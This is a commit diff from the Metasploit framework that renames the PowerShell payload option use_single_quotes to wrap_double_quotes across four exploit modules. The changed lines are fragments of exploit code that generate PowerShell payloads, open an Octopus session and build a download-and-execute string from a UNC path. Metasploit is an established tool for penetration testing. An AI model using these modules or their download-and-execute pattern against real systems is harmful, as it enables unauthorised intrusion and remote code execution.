Land #11660, Update use_single_quotes to wrap_double_quotes
commit
7e62a69e16
|
@ -81,7 +81,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
def exploit
|
||||
# Generate the powershell payload
|
||||
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, use_single_quotes: true)
|
||||
command = cmd_psh_payload(payload.encoded, payload_instance.arch.first, remove_comspec: true, wrap_double_quotes: true)
|
||||
step_name = datastore['STEPNAME'] || rand_text_alphanumeric(4 + rand(32 - 4))
|
||||
session = create_octopus_session unless datastore['APIKEY']
|
||||
|
||||
|
|
|
@ -59,7 +59,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
|
||||
def generate_payload_blob
|
||||
opts = {
|
||||
use_single_quotes: true,
|
||||
wrap_double_quotes: true,
|
||||
encode_final_payload: true,
|
||||
}
|
||||
blob = cmd_psh_payload(payload.encoded,payload_instance.arch.first, opts).split(' ')[-1]
|
||||
|
|
|
@ -79,7 +79,7 @@ class MetasploitModule < Msf::Exploit::Local
|
|||
else
|
||||
psh_options = { :remove_comspec => true,
|
||||
:encode_inner_payload => true,
|
||||
:use_single_quotes => true }
|
||||
:wrap_double_quotes => true }
|
||||
end
|
||||
|
||||
psh = cmd_psh_payload(payload.encoded,
|
||||
|
|
|
@ -65,7 +65,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
self.file_contents = cmd_psh_payload( payload.encoded,
|
||||
payload_instance.arch.first,
|
||||
remove_comspec: true,
|
||||
use_single_quotes: true)
|
||||
wrap_double_quotes: true)
|
||||
|
||||
ignore_cert = Rex::Powershell::PshMethods.ignore_ssl_certificate if ssl
|
||||
download_string = Rex::Powershell::PshMethods.proxy_aware_download_and_exec_string(unc)
|
||||
|
|
Loading…
Reference in New Issue